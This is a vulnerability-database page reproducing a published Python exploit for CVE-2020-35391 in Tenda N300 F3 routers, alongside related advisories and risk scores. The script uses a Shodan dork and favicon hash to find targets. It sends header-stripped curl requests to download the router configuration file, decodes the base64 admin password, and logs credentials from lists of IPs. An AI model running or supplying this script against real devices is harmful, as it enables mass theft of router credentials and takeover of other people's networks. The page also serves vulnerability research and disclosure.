Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing

🗓️ 07 Apr 2023 00:00:00Reported by @h454nsecType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 195 Views

Tenda N300 F3 12.01.01.48 HTTP Request Header Processin

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing Exploit
7 Apr 202300:00
zdt
GithubExploit		Exploit for Forced Browsing in Tenda F3_Firmware
9 Mar 202315:36
githubexploit
Circl		CVE-2020-35391
1 Jan 202112:32
circl
CNNVD		Tenda N300 Resource Management Error Vulnerability
1 Jan 202100:00
cnnvd
CVE		CVE-2020-35391
1 Jan 202100:00
cve
Cvelist		CVE-2020-35391
1 Jan 202100:00
cvelist
NVD		CVE-2020-35391
1 Jan 202107:15
nvd
Packet Storm		Tenda N300 F3 12.01.01.48 Header Processing
10 Apr 202300:00
packetstorm
Prion		Design/Logic Flaw
1 Jan 202107:15
prion
Positive Technologies		PT-2021-11759 · Tenda · Tenda N300 F3
1 Jan 202100:00
ptsecurity
Rows per page
#!/usr/bin/python3

# Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing 
# Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN"
# Date: 09/03/2023
# Exploit Author: @h454nsec
# Github: https://github.com/H454NSec/CVE-2020-35391
# Vendor Homepage: https://www.tendacn.com/default.html
# Product Link: https://www.tendacn.com/product/f3.html
# Version: All
# Tested on: F3v3.0 Firmware (confirmed)
# CVE : CVE-2020-35391

import re
import os
import sys
import argparse
import base64
import requests
import subprocess
try:
    import mmh3
    import codecs
except ImportError:
    print("[!] Install mmh3: pip3 install mmh3")
    sys.exit()

Color_Off="\033[0m" 
Black="\033[0;30m"        # Black
Red="\033[0;31m"          # Red
Green="\033[0;32m"        # Green
Yellow="\033[0;33m"       # Yellow
Blue="\033[0;34m"         # Blue
Purple="\033[0;35m"       # Purple
Cyan="\033[0;36m"         # Cyan
White="\033[0;37m"        # White

def ip_checker(ip):
    if "/" in ip:
        splited = ip.split("/")
        if "http://" in ip or "https://" in ip:
            return f"{splited[0]}://{splited[2]}"
        else:
            return f"http://{splited[0]}"
    else:
        return f"http://{ip}"

def is_tenda(ip):
    try:
        response = requests.get(f'{ip}/favicon.ico')
        favicon = codecs.encode(response.content, "base64")
        favicon_hash = mmh3.hash(favicon)
        if favicon_hash == -2145085239:
            return True
        return False
    except Exception as error:
        return False

def password_decoder(data):
    try:
        for nosense_data in data.split("\n"):
            if ("http_passwd=" in nosense_data):
                encoded_password = nosense_data.split("=")[-1]
                break
        password_bytes = base64.b64decode(encoded_password)
        password = password_bytes.decode("utf-8")
        if (len(password) != 0):
            return password
        return False
    except Exception as error:
        return False

def main(db):
    for ip in db:
        ip_address = ip_checker(ip)
        tenda = is_tenda(ip_address)
        header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="")
        try:
            output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True)
            data = output.decode('utf-8')
            password = password_decoder(data)
            if password:
                if not os.path.isdir("config_dump"):
                    os.mkdir("config_dump")
                with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o:
                    o.write(data)
                with open(f"credential.txt", "a") as o:
                    o.write(f"{ip_address}|{password}\n")
                print(f"{Purple}:{Cyan}{password}{Color_Off}")
            else:
                print()
        except Exception as error:
            print()

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)')
    parser.add_argument('-l', '--list_of_ip', help='List of IP address')
    args = parser.parse_args()
    db = []
    ip_list = args.list_of_ip
    if ip_list:
        with open(ip_list, "r") as fr:
            for data in fr.readlines():
                db.append(data.strip())
    else:
        db.append(args.ip)
    main(db)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Apr 2023 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 23.3
CVSS 3.16.5 - 9.6
EPSS0.46839
tenda n300 f3http requestexploitcve-2020-35391routersecurity vulnerabilitypython scriptfavicon hashshodan dorkvendor homepagefirmwareip addressbase64 decode.
195